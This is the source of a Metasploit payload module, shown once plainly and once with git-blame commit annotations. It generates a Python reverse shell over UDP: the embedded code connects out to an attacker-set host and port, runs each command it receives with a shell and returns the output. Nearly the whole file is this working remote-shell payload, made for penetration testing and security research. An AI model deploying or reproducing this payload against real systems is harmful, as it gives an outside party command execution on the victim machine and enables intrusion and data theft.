modules/payloads/singles/python/shell_reverse_udp.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Payload::Python
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Command Shell, Reverse UDP (via python)',
        'Description' => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.',
        'Author' => 'RageLtMan <rageltman[at]sempervictus>',
        'License' => MSF_LICENSE,
        'Platform' => 'python',
        'Arch' => ARCH_PYTHON,
        'Handler' => Msf::Handler::ReverseUdp,
        'Session' => Msf::Sessions::CommandShell,
        'PayloadType' => 'python',
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
  end

  #
  # Constructs the payload
  #
  def generate(_opts = {})
    super + command_string
  end

  #
  # Returns the command string to use for execution
  #
  def command_string
    cmd = <<~PYTHON
      import socket as s
      import subprocess as r
      so=s.socket(s.AF_INET,s.SOCK_DGRAM)
      o=b''
      while True:
      	so.sendto(o,('#{datastore['LHOST']}',#{datastore['LPORT']}))
      	d=so.recv(1024)
      	if len(d)==0:
      		break
      	p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
      	o=p.stdout.read()+p.stderr.read()
    PYTHON

    py_create_exec_stub(cmd)
  end
end
Python shell via reverse UDP 2017-06-23 14:54:13 -04:00			`##`
Update all module splats from http:// to https:// 2019-08-15 18:10:44 -05:00			`# This module requires Metasploit: https://metasploit.com/download`
Python shell via reverse UDP 2017-06-23 14:54:13 -04:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

update package namespaces 2018-02-13 13:33:36 -06:00			`module MetasploitModule`
Update Python payloads to have dynamic sizes 2022-11-05 15:58:10 -04:00			`CachedSize = :dynamic`
Python shell via reverse UDP 2017-06-23 14:54:13 -04:00
			`include Msf::Payload::Single`
fix #14207 , fix python/shell_reverse_tcp on python3 2020-10-30 17:42:57 +08:00			`include Msf::Payload::Python`
Python shell via reverse UDP 2017-06-23 14:54:13 -04:00			`include Msf::Sessions::CommandShellOptions`

			`def initialize(info = {})`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`super(`
			`merge_info(`
			`info,`
			`'Name' => 'Command Shell, Reverse UDP (via python)',`
			`'Description' => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.',`
			`'Author' => 'RageLtMan <rageltman[at]sempervictus>',`
			`'License' => MSF_LICENSE,`
			`'Platform' => 'python',`
			`'Arch' => ARCH_PYTHON,`
			`'Handler' => Msf::Handler::ReverseUdp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'python',`
			`'Payload' => {`
			`'Offsets' => {},`
Python shell via reverse UDP 2017-06-23 14:54:13 -04:00			`'Payload' => ''`
			`}`
modules/payloads/singles: Resolve RuboCop violations 2025-04-20 02:57:34 +10:00			`)`
			`)`
Python shell via reverse UDP 2017-06-23 14:54:13 -04:00			`end`

			`#`
			`# Constructs the payload`
			`#`
Fix crash when generating payload sizes 2022-11-04 00:33:03 +00:00			`def generate(_opts = {})`
Python shell via reverse UDP 2017-06-23 14:54:13 -04:00			`super + command_string`
			`end`

			`#`
			`# Returns the command string to use for execution`
			`#`
			`def command_string`
python code golf and convert to squiggly heredoc 2020-11-06 13:53:22 +08:00			`cmd = <<~PYTHON`
			`import socket as s`
			`import subprocess as r`
			`so=s.socket(s.AF_INET,s.SOCK_DGRAM)`
fix python/shell_reverse_udp 2020-11-17 17:33:43 +08:00			`o=b''`
python code golf and convert to squiggly heredoc 2020-11-06 13:53:22 +08:00			`while True:`
fix python/shell_reverse_udp 2020-11-17 17:33:43 +08:00			`so.sendto(o,('#{datastore['LHOST']}',#{datastore['LPORT']}))`
python code golf and convert to squiggly heredoc 2020-11-06 13:53:22 +08:00			`d=so.recv(1024)`
			`if len(d)==0:`
			`break`
decoding bytes from all python payloads 2023-06-08 06:44:37 +05:30			`p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)`
python code golf and convert to squiggly heredoc 2020-11-06 13:53:22 +08:00			`o=p.stdout.read()+p.stderr.read()`
			`PYTHON`
Python shell via reverse UDP 2017-06-23 14:54:13 -04:00
fix #14207 , fix python/shell_reverse_tcp on python3 2020-10-30 17:42:57 +08:00			`py_create_exec_stub(cmd)`
Python shell via reverse UDP 2017-06-23 14:54:13 -04:00			`end`
			`end`